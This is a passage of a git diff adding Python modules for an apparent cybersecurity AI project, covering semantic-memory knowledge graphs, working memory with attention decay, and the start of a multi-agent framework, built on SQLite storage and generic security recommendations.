self.logger.info(f"Successfully processed scenario: {scenario_id}") + + except Exception as e: + results["status"] = "error" + results["error"] = str(e) + self.logger.error(f"Error processing scenario {scenario_id}: {e}") + + return results + + async def _generate_recommendations(self, scenario: Dict[str, Any], + reasoning_results: Dict[str, Any]) -> List[str]: + """Generate actionable recommendations based on scenario analysis""" + + recommendations = [] + + # Base recommendations based on scenario type + scenario_type = scenario.get("type", "general") + + if scenario_type == "vulnerability_assessment": + recommendations.extend([ + "Conduct comprehensive vulnerability scan", + "Prioritize critical vulnerabilities for immediate remediation", + "Implement security patches and updates", + "Establish regular vulnerability monitoring" + ]) + elif scenario_type == "incident_response": + recommendations.extend([ + "Immediately contain the security incident", + "Preserve forensic evidence", + "Assess scope and impact of the incident", + "Implement recovery procedures", + "Conduct post-incident analysis" + ]) + elif scenario_type == "penetration_testing": + recommendations.extend([ + "Define clear scope and objectives", + "Follow structured testing methodology", + "Document all findings and evidence", + "Provide actionable remediation guidance" + ]) + else: + recommendations.extend([ + "Assess current security posture", + "Identify key risk areas", + "Develop mitigation strategies", + "Implement monitoring and detection" + ]) + + # Add reasoning-based recommendations + for reasoning_type, results in reasoning_results.items(): + if results["confidence"] > 0.7: + recommendations.append(f"High confidence in {reasoning_type} analysis suggests prioritizing related actions") + + # Search for similar past experiences + similar_memories = await self.memory_manager.search_memories( + scenario.get("title", ""), [MemoryType.EPISODIC], limit=3 + ) + + if similar_memories: + recommendations.append(f"Apply lessons learned from {len(similar_memories)} similar past scenarios") + + return recommendations[:10] # Limit to top 10 recommendations + +# Factory function for easy instantiation +def create_persistent_cognitive_system(db_path: str = "data/cognitive_system.db") -> PersistentCognitiveSystem: + """Create and initialize the persistent cognitive system""" + return PersistentCognitiveSystem(db_path) + +# Main execution for testing +if __name__ == "__main__": + import asyncio + + # Configure logging + logging.basicConfig( + level=logging.INFO, + format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' + ) + + async def test_system(): + """Test the persistent cognitive system""" + + # Create system + system = create_persistent_cognitive_system() + + # Test scenario + test_scenario = { + "type": "vulnerability_assessment", + "title": "Web Application Security Assessment", + "objective": "Assess security posture of critical web application", + "details": [ + "Web application handles sensitive customer data", + "Application has not been tested in 12 months", + "Recent security incidents in similar applications reported" + ], + "evidence": [ + "Previous vulnerability scan results", + "Security incident reports from industry", + "Application architecture documentation" + ], + "reasoning_types": [ReasoningType.DEDUCTIVE, ReasoningType.CAUSAL], + "requires_planning": True, + "template": "cybersecurity_assessment" + } + + # Process scenario + results = await system.process_complex_scenario(test_scenario) + + print("=== Persistent Cognitive System Test Results ===") + print(json.dumps(results, indent=2, default=str)) + + # Test memory search + memories = await system.memory_manager.search_memories("vulnerability", limit=5) + print(f"\n=== Found {len(memories)} memories related to 'vulnerability' ===") + + for memory in memories: + print(f"- {memory.memory_id}: {memory.content.get('type', 'Unknown')} (importance: {memory.importance:.2f})") + + # Run test + asyncio.run(test_system()) diff --git a/src/cognitive/semantic_memory.py b/src/cognitive/semantic_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..cfa73eaf07998546f790cea00ba8c580b9ad2fe3 --- /dev/null +++ b/src/cognitive/semantic_memory.py @@ -0,0 +1,424 @@ +""" +Semantic Memory Networks with Knowledge Graphs for Cybersecurity Concepts +Implements concept relationships and knowledge reasoning +""" +import sqlite3 +import json +import uuid +import networkx as nx +from datetime import datetime +from typing import Dict, List, Any, Optional, Tuple, Set +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import pickle + +logger = logging.getLogger(__name__) + +@dataclass +class SemanticConcept: + """Individual semantic concept in the knowledge graph""" + id: str + name: str + concept_type: str # vulnerability, technique, tool, indicator, etc. + description: str + properties: Dict[str, Any] + confidence: float + created_at: datetime + updated_at: datetime + source: str # mitre, cve, custom, etc. + +@dataclass +class ConceptRelation: + """Relationship between semantic concepts""" + id: str + source_concept_id: str + target_concept_id: str + relation_type: str # uses, mitigates, exploits, indicates, etc. + strength: float + properties: Dict[str, Any] + created_at: datetime + evidence: List[str] + +class SemanticMemoryNetwork: + """Advanced semantic memory with knowledge graph capabilities""" + + def __init__(self, db_path: str = "data/cognitive/semantic_memory.db"): + """Initialize semantic memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self._init_database() + self._knowledge_graph = nx.MultiDiGraph() + self._concept_cache = {} + self._load_knowledge_graph() + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS semantic_concepts ( + id TEXT PRIMARY KEY, + name TEXT NOT NULL, + concept_type TEXT NOT NULL, + description TEXT, + properties TEXT, + confidence REAL DEFAULT 0.5, + source TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + updated_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS concept_relations ( + id TEXT PRIMARY KEY, + source_concept_id TEXT, + target_concept_id TEXT, + relation_type TEXT NOT NULL, + strength REAL DEFAULT 0.5, + properties TEXT, + evidence TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP, + FOREIGN KEY (source_concept_id) REFERENCES semantic_concepts(id), + FOREIGN KEY (target_concept_id) REFERENCES semantic_concepts(id) + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS knowledge_queries ( + id TEXT PRIMARY KEY, + query_text TEXT NOT NULL, + query_type TEXT, + concepts_used TEXT, + relations_used TEXT, + result TEXT, + confidence REAL, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS concept_clusters ( + id TEXT PRIMARY KEY, + cluster_name TEXT NOT NULL, + concept_ids TEXT, + cluster_properties TEXT, + created_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + # Create indices for performance + conn.execute("CREATE INDEX IF NOT EXISTS idx_concept_name ON semantic_concepts(name)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_concept_type ON semantic_concepts(concept_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_relation_type ON concept_relations(relation_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_relation_source ON concept_relations(source_concept_id)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_relation_target ON concept_relations(target_concept_id)") + + def add_concept(self, name: str, concept_type: str, description: str = "", + properties: Dict[str, Any] = None, confidence: float = 0.5, + source: str = "custom") -> str: + """Add a new semantic concept to the knowledge graph""" + try: + concept_id = str(uuid.uuid4()) + + concept = SemanticConcept( + id=concept_id, + name=name, + concept_type=concept_type, + description=description, + properties=properties or {}, + confidence=confidence, + created_at=datetime.now(), + updated_at=datetime.now(), + source=source + ) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO semantic_concepts ( + id, name, concept_type, description, properties, + confidence, source, created_at, updated_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + concept.id, concept.name, concept.concept_type, + concept.description, json.dumps(concept.properties), + concept.confidence, concept.source, + concept.created_at.isoformat(), + concept.updated_at.isoformat() + )) + + # Add to knowledge graph + self._knowledge_graph.add_node( + concept_id, + name=name, + concept_type=concept_type, + description=description, + properties=concept.properties, + confidence=confidence + ) + + # Cache the concept + self._concept_cache[concept_id] = concept + + logger.info(f"Added semantic concept: {name} ({concept_type})") + return concept_id + + except Exception as e: + logger.error(f"Error adding concept: {e}") + return "" + + def add_relation(self, source_concept_id: str, target_concept_id: str, + relation_type: str, strength: float = 0.5, + properties: Dict[str, Any] = None, + evidence: List[str] = None) -> str: + """Add a relationship between concepts""" + try: + relation_id = str(uuid.uuid4()) + + relation = ConceptRelation( + id=relation_id, + source_concept_id=source_concept_id, + target_concept_id=target_concept_id, + relation_type=relation_type, + strength=strength, + properties=properties or {}, + created_at=datetime.now(), + evidence=evidence or [] + ) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO concept_relations ( + id, source_concept_id, target_concept_id, relation_type, + strength, properties, evidence, created_at + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?) + """, ( + relation.id, relation.source_concept_id, + relation.target_concept_id, relation.relation_type, + relation.strength, json.dumps(relation.properties), + json.dumps(relation.evidence), + relation.created_at.isoformat() + )) + + # Add to knowledge graph + self._knowledge_graph.add_edge( + source_concept_id, + target_concept_id, + relation_id=relation_id, + relation_type=relation_type, + strength=strength, + properties=relation.properties + ) + + logger.info(f"Added relation: {relation_type} ({strength:.2f})") + return relation_id + + except Exception as e: + logger.error(f"Error adding relation: {e}") + return "" + + def find_concept(self, name: str = "", concept_type: str = "", + properties: Dict[str, Any] = None) -> List[SemanticConcept]: + """Find concepts matching criteria""" + try: + with sqlite3.connect(self.db_path) as conn: + conditions = [] + params = [] + + if name: + conditions.append("name LIKE ?") + params.append(f"%{name}%") + + if concept_type: + conditions.append("concept_type = ?") + params.append(concept_type) + + where_clause = " AND ".join(conditions) if conditions else "1=1" + + cursor = conn.execute(f""" + SELECT * FROM semantic_concepts + WHERE {where_clause} + ORDER BY confidence DESC, name + """, params) + + concepts = [] + for row in cursor.fetchall(): + concept = SemanticConcept( + id=row[0], + name=row[1], + concept_type=row[2], + description=row[3] or "", + properties=json.loads(row[4]) if row[4] else {}, + confidence=row[5], + created_at=datetime.fromisoformat(row[7]), + updated_at=datetime.fromisoformat(row[8]), + source=row[6] or "unknown" + ) + + # Filter by properties if specified + if properties: + matches = all( + concept.properties.get(k) == v + for k, v in properties.items() + ) + if matches: + concepts.append(concept) + else: + concepts.append(concept) + + logger.info(f"Found {len(concepts)} matching concepts") + return concepts + + except Exception as e: + logger.error(f"Error finding concepts: {e}") + return [] + + def reason_about_threat(self, threat_indicators: List[str]) -> Dict[str, Any]: + """Perform knowledge-based reasoning about a potential threat""" + try: + reasoning_result = { + 'indicators': threat_indicators, + 'matched_concepts': [], + 'inferred_relations': [], + 'threat_assessment': {}, + 'recommendations': [], + 'confidence': 0.0 + } + + # Find concepts matching the indicators + matched_concepts = [] + for indicator in threat_indicators: + concepts = self.find_concept(name=indicator) + matched_concepts.extend(concepts) + + reasoning_result['matched_concepts'] = [ + { + 'id': c.id, + 'name': c.name, + 'type': c.concept_type, + 'confidence': c.confidence + } for c in matched_concepts + ] + + # Calculate overall threat confidence + if matched_concepts: + avg_confidence = sum(c.confidence for c in matched_concepts) / len(matched_concepts) + reasoning_result['confidence'] = min(avg_confidence, 1.0) + + # Generate threat assessment based on concept types + threat_types = {} + for concept in matched_concepts: + if concept.concept_type not in threat_types: + threat_types[concept.concept_type] = 0 + threat_types[concept.concept_type] += concept.confidence + + if 'vulnerability' in threat_types and 'technique' in threat_types: + reasoning_result['threat_assessment']['risk_level'] = 'HIGH' + reasoning_result['threat_assessment']['rationale'] = 'Vulnerability and attack technique combination detected' + elif 'malware' in threat_types or 'exploit' in threat_types: + reasoning_result['threat_assessment']['risk_level'] = 'MEDIUM' + reasoning_result['threat_assessment']['rationale'] = 'Malicious indicators present' + else: + reasoning_result['threat_assessment']['risk_level'] = 'LOW' + reasoning_result['threat_assessment']['rationale'] = 'Limited threat indicators' + + logger.info(f"Threat reasoning complete: {reasoning_result['threat_assessment']['risk_level']} risk") + return reasoning_result + + except Exception as e: + logger.error(f"Error in threat reasoning: {e}") + return {'error': str(e)} + + def _load_knowledge_graph(self): + """Load knowledge graph from database""" + try: + with sqlite3.connect(self.db_path) as conn: + # Load concepts + cursor = conn.execute("SELECT * FROM semantic_concepts") + for row in cursor.fetchall(): + concept_id = row[0] + self._knowledge_graph.add_node( + concept_id, + name=row[1], + concept_type=row[2], + description=row[3] or "", + properties=json.loads(row[4]) if row[4] else {}, + confidence=row[5] + ) + + # Load relations + cursor = conn.execute("SELECT * FROM concept_relations") + for row in cursor.fetchall(): + self._knowledge_graph.add_edge( + row[1], # source_concept_id + row[2], # target_concept_id + relation_id=row[0], + relation_type=row[3], + strength=row[4], + properties=json.loads(row[5]) if row[5] else {} + ) + + logger.info(f"Loaded knowledge graph: {self._knowledge_graph.number_of_nodes()} nodes, {self._knowledge_graph.number_of_edges()} edges") + + except Exception as e: + logger.error(f"Error loading knowledge graph: {e}") + + def _store_knowledge_query(self, query_text: str, query_type: str, + concepts_used: List[str], relations_used: List[str], + result: Dict[str, Any], confidence: float): + """Store knowledge query for learning""" + try: + query_id = str(uuid.uuid4()) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO knowledge_queries ( + id, query_text, query_type, concepts_used, + relations_used, result, confidence + ) VALUES (?, ?, ?, ?, ?, ?, ?) + """, ( + query_id, query_text, query_type, + json.dumps(concepts_used), json.dumps(relations_used), + json.dumps(result), confidence + )) + + except Exception as e: + logger.error(f"Error storing knowledge query: {e}") + + def get_semantic_statistics(self) -> Dict[str, Any]: + """Get comprehensive semantic memory statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = {} + + # Basic counts + cursor = conn.execute("SELECT COUNT(*) FROM semantic_concepts") + stats['total_concepts'] = cursor.fetchone()[0] + + cursor = conn.execute("SELECT COUNT(*) FROM concept_relations") + stats['total_relations'] = cursor.fetchone()[0] + + # Concept type distribution + cursor = conn.execute(""" + SELECT concept_type, COUNT(*) + FROM semantic_concepts + GROUP BY concept_type + """) + stats['concept_types'] = dict(cursor.fetchall()) + + # Relation type distribution + cursor = conn.execute(""" + SELECT relation_type, COUNT(*) + FROM concept_relations + GROUP BY relation_type + """) + stats['relation_types'] = dict(cursor.fetchall()) + + return stats + + except Exception as e: + logger.error(f"Error getting semantic statistics: {e}") + return {'error': str(e)} + +# Export the main classes +__all__ = ['SemanticMemoryNetwork', 'SemanticConcept', 'ConceptRelation'] diff --git a/src/cognitive/working_memory.py b/src/cognitive/working_memory.py new file mode 100644 index 0000000000000000000000000000000000000000..aa50384214020bb4b0e744f98ecb8143af1707da --- /dev/null +++ b/src/cognitive/working_memory.py @@ -0,0 +1,627 @@ +""" +Working Memory Management System with Attention-based Focus and Context Switching +Implements dynamic attention mechanisms and context management for cognitive agents +""" +import sqlite3 +import json +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple +from dataclasses import dataclass, asdict +import logging +from pathlib import Path +import heapq +import threading +import time + +logger = logging.getLogger(__name__) + +@dataclass +class WorkingMemoryItem: + """Individual item in working memory""" + id: str + content: str + item_type: str # goal, observation, hypothesis, plan, etc. + priority: float # 0.0-1.0, higher is more important + activation_level: float # 0.0-1.0, current activation + created_at: datetime + last_accessed: datetime + access_count: int + decay_rate: float # how quickly activation decays + context_tags: List[str] + source_agent: str + related_items: List[str] # IDs of related items + +@dataclass +class AttentionFocus: + """Current attention focus with weighted priorities""" + focus_id: str + focus_type: str # task, threat, goal, etc. + focus_items: List[str] # Working memory item IDs + attention_weight: float # 0.0-1.0 + duration: timedelta + created_at: datetime + metadata: Dict[str, Any] + +class WorkingMemoryManager: + """Advanced working memory with attention-based focus management""" + + def __init__(self, db_path: str = "data/cognitive/working_memory.db", + capacity: int = 50, decay_interval: float = 30.0): + """Initialize working memory system""" + self.db_path = Path(db_path) + self.db_path.parent.mkdir(parents=True, exist_ok=True) + self.capacity = capacity # Maximum items in working memory + self.decay_interval = decay_interval # Seconds between decay updates + + self._init_database() + self._memory_items = {} # In-memory cache + self._attention_focus = None + self._attention_history = [] + + # Start background decay process + self._decay_thread = threading.Thread(target=self._decay_loop, daemon=True) + self._decay_running = True + self._decay_thread.start() + + # Load existing items + self._load_working_memory() + + def _init_database(self): + """Initialize database schemas""" + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + CREATE TABLE IF NOT EXISTS working_memory_items ( + id TEXT PRIMARY KEY, + content TEXT NOT NULL, + item_type TEXT NOT NULL, + priority REAL NOT NULL, + activation_level REAL NOT NULL, + created_at TEXT NOT NULL, + last_accessed TEXT NOT NULL, + access_count INTEGER DEFAULT 0, + decay_rate REAL DEFAULT 0.1, + context_tags TEXT, + source_agent TEXT, + related_items TEXT, + updated_at TEXT DEFAULT CURRENT_TIMESTAMP + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS attention_focus_log ( + id TEXT PRIMARY KEY, + focus_type TEXT NOT NULL, + focus_items TEXT, + attention_weight REAL NOT NULL, + duration_seconds REAL, + created_at TEXT NOT NULL, + ended_at TEXT, + metadata TEXT, + agent_id TEXT + ) + """) + + conn.execute(""" + CREATE TABLE IF NOT EXISTS context_switches ( + id TEXT PRIMARY KEY, + from_focus TEXT, + to_focus TEXT, + switch_reason TEXT, + switch_cost REAL, + timestamp TEXT DEFAULT CURRENT_TIMESTAMP, + agent_id TEXT + ) + """) + + # Create indices + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_priority ON working_memory_items(priority DESC)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_activation ON working_memory_items(activation_level DESC)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_type ON working_memory_items(item_type)") + conn.execute("CREATE INDEX IF NOT EXISTS idx_wm_agent ON working_memory_items(source_agent)") + + def add_item(self, content: str, item_type: str, priority: float = 0.5, + source_agent: str = "", context_tags: List[str] = None) -> str: + """Add item to working memory with attention-based priority""" + try: + item_id = str(uuid.uuid4()) + + item = WorkingMemoryItem( + id=item_id, + content=content, + item_type=item_type, + priority=priority, + activation_level=priority, # Initial activation equals priority + created_at=datetime.now(), + last_accessed=datetime.now(), + access_count=0, + decay_rate=0.1, # Default decay rate + context_tags=context_tags or [], + source_agent=source_agent, + related_items=[] + ) + + # Check capacity and evict if necessary + if len(self._memory_items) >= self.capacity: + self._evict_lowest_activation() + + # Store in memory and database + self._memory_items[item_id] = item + self._store_item_to_db(item) + + # Update attention focus if this is high priority + if priority > 0.7 and (not self._attention_focus or + priority > self._attention_focus.attention_weight): + self._update_attention_focus(item_id, item_type, priority) + + logger.info(f"Added working memory item: {item_type} (priority: {priority:.2f})") + return item_id + + except Exception as e: + logger.error(f"Error adding working memory item: {e}") + return "" + + def get_item(self, item_id: str) -> Optional[WorkingMemoryItem]: + """Retrieve item from working memory and update activation""" + try: + if item_id in self._memory_items: + item = self._memory_items[item_id] + + # Update access statistics + item.last_accessed = datetime.now() + item.access_count += 1 + + # Boost activation on access (but cap at 1.0) + activation_boost = min(0.2, 1.0 - item.activation_level) + item.activation_level = min(1.0, item.activation_level + activation_boost) + + # Update in database + self._update_item_in_db(item) + + logger.debug(f"Retrieved working memory item: {item_id[:8]}...") + return item + + logger.warning(f"Working memory item not found: {item_id}") + return None + + except Exception as e: + logger.error(f"Error retrieving working memory item: {e}") + return None + + def get_active_items(self, min_activation: float = 0.3, + item_type: str = "", limit: int = 20) -> List[WorkingMemoryItem]: + """Get currently active items above activation threshold""" + try: + active_items = [] + + for item in self._memory_items.values(): + if (item.activation_level >= min_activation and + (not item_type or item.item_type == item_type)): + active_items.append(item) + + # Sort by activation level (highest first) + active_items.sort(key=lambda x: x.activation_level, reverse=True) + + logger.info(f"Retrieved {len(active_items[:limit])} active items") + return active_items[:limit] + + except Exception as e: + logger.error(f"Error getting active items: {e}") + return [] + + def focus_attention(self, focus_type: str, item_ids: List[str], + attention_weight: float = 0.8, agent_id: str = "") -> str: + """Focus attention on specific items""" + try: + focus_id = str(uuid.uuid4()) + + # End current focus if exists + if self._attention_focus: + self._end_attention_focus() + + # Create new attention focus + new_focus = AttentionFocus( + focus_id=focus_id, + focus_type=focus_type, + focus_items=item_ids, + attention_weight=attention_weight, + duration=timedelta(0), + created_at=datetime.now(), + metadata={'agent_id': agent_id} + ) + + self._attention_focus = new_focus + + # Boost activation of focused items + for item_id in item_ids: + if item_id in self._memory_items: + item = self._memory_items[item_id] + item.activation_level = min(1.0, item.activation_level + 0.3) + self._update_item_in_db(item) + + # Store focus in database + self._store_attention_focus(new_focus) + + logger.info(f"Focused attention on {focus_type}: {len(item_ids)} items") + return focus_id + + except Exception as e: + logger.error(f"Error focusing attention: {e}") + return "" + + def switch_context(self, new_focus_type: str, new_item_ids: List[str], + switch_reason: str = "", agent_id: str = "") -> Dict[str, Any]: + """Switch attention context with cost calculation""" + try: + switch_result = { + 'switch_id': str(uuid.uuid4()), + 'from_focus': None, + 'to_focus': new_focus_type, + 'switch_cost': 0.0, + 'success': False + } + + # Calculate switch cost based on current focus + if self._attention_focus: + switch_result['from_focus'] = self._attention_focus.focus_type + + # Cost factors: + # 1. How long we've been in current focus + current_duration = datetime.now() - self._attention_focus.created_at + duration_cost = min(current_duration.total_seconds() / 300.0, 0.3) # Max 5min + + # 2. Number of active items being abandoned + abandoned_items = len(self._attention_focus.focus_items) + abandonment_cost = min(abandoned_items * 0.1, 0.4) + + # 3. Similarity between old and new focus + similarity_discount = self._calculate_focus_similarity( + self._attention_focus.focus_items, new_item_ids + ) + + total_cost = duration_cost + abandonment_cost - similarity_discount + switch_result['switch_cost'] = max(0.0, min(total_cost, 1.0)) + + # Record context switch + self._record_context_switch( + self._attention_focus.focus_type, + new_focus_type, + switch_reason, + switch_result['switch_cost'], + agent_id + ) + + # Perform the switch + focus_id = self.focus_attention(new_focus_type, new_item_ids, agent_id=agent_id) + switch_result['success'] = bool(focus_id) + + logger.info(f"Context switch: {switch_result['from_focus']} -> {new_focus_type} (cost: {switch_result['switch_cost']:.3f})") + return switch_result + + except Exception as e: + logger.error(f"Error switching context: {e}") + return {'error': str(e)} + + def get_current_focus(self) -> Optional[AttentionFocus]: + """Get current attention focus""" + return self._attention_focus + + def decay_memory(self): + """Apply decay to all working memory items""" + try: + decayed_count = 0 + evicted_items = [] + + for item_id, item in list(self._memory_items.items()): + # Apply decay based on time since last access + time_since_access = datetime.now() - item.last_accessed + decay_amount = item.decay_rate * (time_since_access.total_seconds() / 60.0) + + item.activation_level = max(0.0, item.activation_level - decay_amount) + decayed_count += 1 + + # Evict items with very low activation + if item.activation_level < 0.05: + evicted_items.append(item_id) + else: + # Update in database + self._update_item_in_db(item) + + # Remove evicted items + for item_id in evicted_items: + del self._memory_items[item_id] + self._remove_item_from_db(item_id) + + if evicted_items: + logger.info(f"Memory decay: {decayed_count} items decayed, {len(evicted_items)} evicted") + + except Exception as e: + logger.error(f"Error during memory decay: {e}") + + def find_related_items(self, item_id: str, max_items: int = 5) -> List[WorkingMemoryItem]: + """Find items related to the given item""" + try: + if item_id not in self._memory_items: + return [] + + source_item = self._memory_items[item_id] + related_items = [] + + for other_id, other_item in self._memory_items.items(): + if other_id == item_id: + continue + + # Calculate relatedness score + relatedness = 0.0 + + # Same type bonus + if source_item.item_type == other_item.item_type: + relatedness += 0.3 + + # Shared context tags + shared_tags = set(source_item.context_tags) & set(other_item.context_tags) + if shared_tags: + relatedness += len(shared_tags) * 0.2 + + # Same source agent + if source_item.source_agent == other_item.source_agent: + relatedness += 0.2 + + # Temporal proximity + time_diff = abs((source_item.created_at - other_item.created_at).total_seconds()) + if time_diff < 300: # Within 5 minutes + relatedness += 0.3 * (300 - time_diff) / 300 + + if relatedness > 0.1: # Minimum relatedness threshold + related_items.append((other_item, relatedness)) + + # Sort by relatedness and return top items + related_items.sort(key=lambda x: x[1], reverse=True) + + return [item for item, score in related_items[:max_items]] + + except Exception as e: + logger.error(f"Error finding related items: {e}") + return [] + + def _update_attention_focus(self, item_id: str, item_type: str, priority: float): + """Update current attention focus""" + if self._attention_focus: + self._end_attention_focus() + + self.focus_attention(item_type, [item_id], priority) + + def _end_attention_focus(self): + """End current attention focus""" + if self._attention_focus: + # Update duration + self._attention_focus.duration = datetime.now() - self._attention_focus.created_at + + # Add to history + self._attention_history.append(self._attention_focus) + + # Update in database + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE attention_focus_log SET + ended_at = ?, + duration_seconds = ? + WHERE id = ? + """, ( + datetime.now().isoformat(), + self._attention_focus.duration.total_seconds(), + self._attention_focus.focus_id + )) + + self._attention_focus = None + + def _evict_lowest_activation(self): + """Evict item with lowest activation to make space""" + if not self._memory_items: + return + + lowest_item_id = min( + self._memory_items.keys(), + key=lambda x: self._memory_items[x].activation_level + ) + + del self._memory_items[lowest_item_id] + self._remove_item_from_db(lowest_item_id) + + logger.debug(f"Evicted working memory item: {lowest_item_id[:8]}...") + + def _calculate_focus_similarity(self, items1: List[str], items2: List[str]) -> float: + """Calculate similarity between two sets of focus items""" + if not items1 or not items2: + return 0.0 + + set1 = set(items1) + set2 = set(items2) + + intersection = len(set1 & set2) + union = len(set1 | set2) + + return intersection / union if union > 0 else 0.0 + + def _record_context_switch(self, from_focus: str, to_focus: str, + reason: str, cost: float, agent_id: str): + """Record context switch in database""" + try: + switch_id = str(uuid.uuid4()) + + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO context_switches ( + id, from_focus, to_focus, switch_reason, + switch_cost, agent_id + ) VALUES (?, ?, ?, ?, ?, ?) + """, (switch_id, from_focus, to_focus, reason, cost, agent_id)) + + except Exception as e: + logger.error(f"Error recording context switch: {e}") + + def _decay_loop(self): + """Background thread for memory decay""" + while self._decay_running: + try: + time.sleep(self.decay_interval) + self.decay_memory() + except Exception as e: + logger.error(f"Error in decay loop: {e}") + + def _load_working_memory(self): + """Load working memory items from database""" + try: + with sqlite3.connect(self.db_path) as conn: + cursor = conn.execute(""" + SELECT * FROM working_memory_items + ORDER BY activation_level DESC + LIMIT ? + """, (self.capacity,)) + + for row in cursor.fetchall(): + item = WorkingMemoryItem( + id=row[0], + content=row[1], + item_type=row[2], + priority=row[3], + activation_level=row[4], + created_at=datetime.fromisoformat(row[5]), + last_accessed=datetime.fromisoformat(row[6]), + access_count=row[7], + decay_rate=row[8], + context_tags=json.loads(row[9]) if row[9] else [], + source_agent=row[10] or "", + related_items=json.loads(row[11]) if row[11] else [] + ) + self._memory_items[item.id] = item + + logger.info(f"Loaded {len(self._memory_items)} working memory items") + + except Exception as e: + logger.error(f"Error loading working memory: {e}") + + def _store_item_to_db(self, item: WorkingMemoryItem): + """Store item to database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO working_memory_items ( + id, content, item_type, priority, activation_level, + created_at, last_accessed, access_count, decay_rate, + context_tags, source_agent, related_items + ) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + """, ( + item.id, item.content, item.item_type, item.priority, + item.activation_level, item.created_at.isoformat(), + item.last_accessed.isoformat(), item.access_count, + item.decay_rate, json.dumps(item.context_tags), + item.source_agent, json.dumps(item.related_items) + )) + + except Exception as e: + logger.error(f"Error storing item to database: {e}") + + def _update_item_in_db(self, item: WorkingMemoryItem): + """Update item in database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + UPDATE working_memory_items SET + activation_level = ?, last_accessed = ?, + access_count = ?, updated_at = CURRENT_TIMESTAMP + WHERE id = ? + """, ( + item.activation_level, item.last_accessed.isoformat(), + item.access_count, item.id + )) + + except Exception as e: + logger.error(f"Error updating item in database: {e}") + + def _remove_item_from_db(self, item_id: str): + """Remove item from database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute("DELETE FROM working_memory_items WHERE id = ?", (item_id,)) + + except Exception as e: + logger.error(f"Error removing item from database: {e}") + + def _store_attention_focus(self, focus: AttentionFocus): + """Store attention focus in database""" + try: + with sqlite3.connect(self.db_path) as conn: + conn.execute(""" + INSERT INTO attention_focus_log ( + id, focus_type, focus_items, attention_weight, + created_at, metadata, agent_id + ) VALUES (?, ?, ?, ?, ?, ?, ?) + """, ( + focus.focus_id, focus.focus_type, + json.dumps(focus.focus_items), focus.attention_weight, + focus.created_at.isoformat(), json.dumps(focus.metadata), + focus.metadata.get('agent_id', '') + )) + + except Exception as e: + logger.error(f"Error storing attention focus: {e}") + + def get_working_memory_statistics(self) -> Dict[str, Any]: + """Get comprehensive working memory statistics""" + try: + with sqlite3.connect(self.db_path) as conn: + stats = { + 'current_capacity': len(self._memory_items), + 'max_capacity': self.capacity, + 'utilization': len(self._memory_items) / self.capacity + } + + # Activation distribution + if self._memory_items: + activations = [item.activation_level for item in self._memory_items.values()] + stats['avg_activation'] = sum(activations) / len(activations) + stats['max_activation'] = max(activations) + stats['min_activation'] = min(activations) + + # Item type distribution + type_counts = {} + for item in self._memory_items.values(): + type_counts[item.item_type] = type_counts.get(item.item_type, 0) + 1 + stats['item_types'] = type_counts + + # Context switch statistics + cursor = conn.execute(""" + SELECT COUNT(*), AVG(switch_cost) + FROM context_switches + WHERE timestamp > datetime('now', '-1 hour') + """) + row = cursor.fetchone() + stats['recent_switches'] = row[0] or 0 + stats['avg_switch_cost'] = row[1] or 0.0 + + # Current focus + if self._attention_focus: + stats['current_focus'] = { + 'type': self._attention_focus.focus_type, + 'items': len(self._attention_focus.focus_items), + 'weight': self._attention_focus.attention_weight, + 'duration_seconds': (datetime.now() - self._attention_focus.created_at).total_seconds() + } + else: + stats['current_focus'] = None + + return stats + + except Exception as e: + logger.error(f"Error getting working memory statistics: {e}") + return {'error': str(e)} + + def cleanup(self): + """Cleanup resources""" + self._decay_running = False + if self._decay_thread.is_alive(): + self._decay_thread.join(timeout=1.0) + +# Export the main classes +__all__ = ['WorkingMemoryManager', 'WorkingMemoryItem', 'AttentionFocus'] diff --git a/src/collaboration/multi_agent_framework.py b/src/collaboration/multi_agent_framework.py new file mode 100644 index 0000000000000000000000000000000000000000..7441bb401c4f24f3097ddc9e7b930b31c44ae989 --- /dev/null +++ b/src/collaboration/multi_agent_framework.py @@ -0,0 +1,588 @@ +""" +Multi-Agent Collaboration Framework for Cyber-LLM +Advanced agent-to-agent communication and swarm intelligence + +Author: Muzan Sano +""" + +import asyncio +import json +import logging +import uuid +from datetime import datetime, timedelta +from typing import Dict, List, Any, Optional, Tuple, Union, Callable +from dataclasses import dataclass, field +from enum import Enum +import numpy as np +from collections import defaultdict, deque 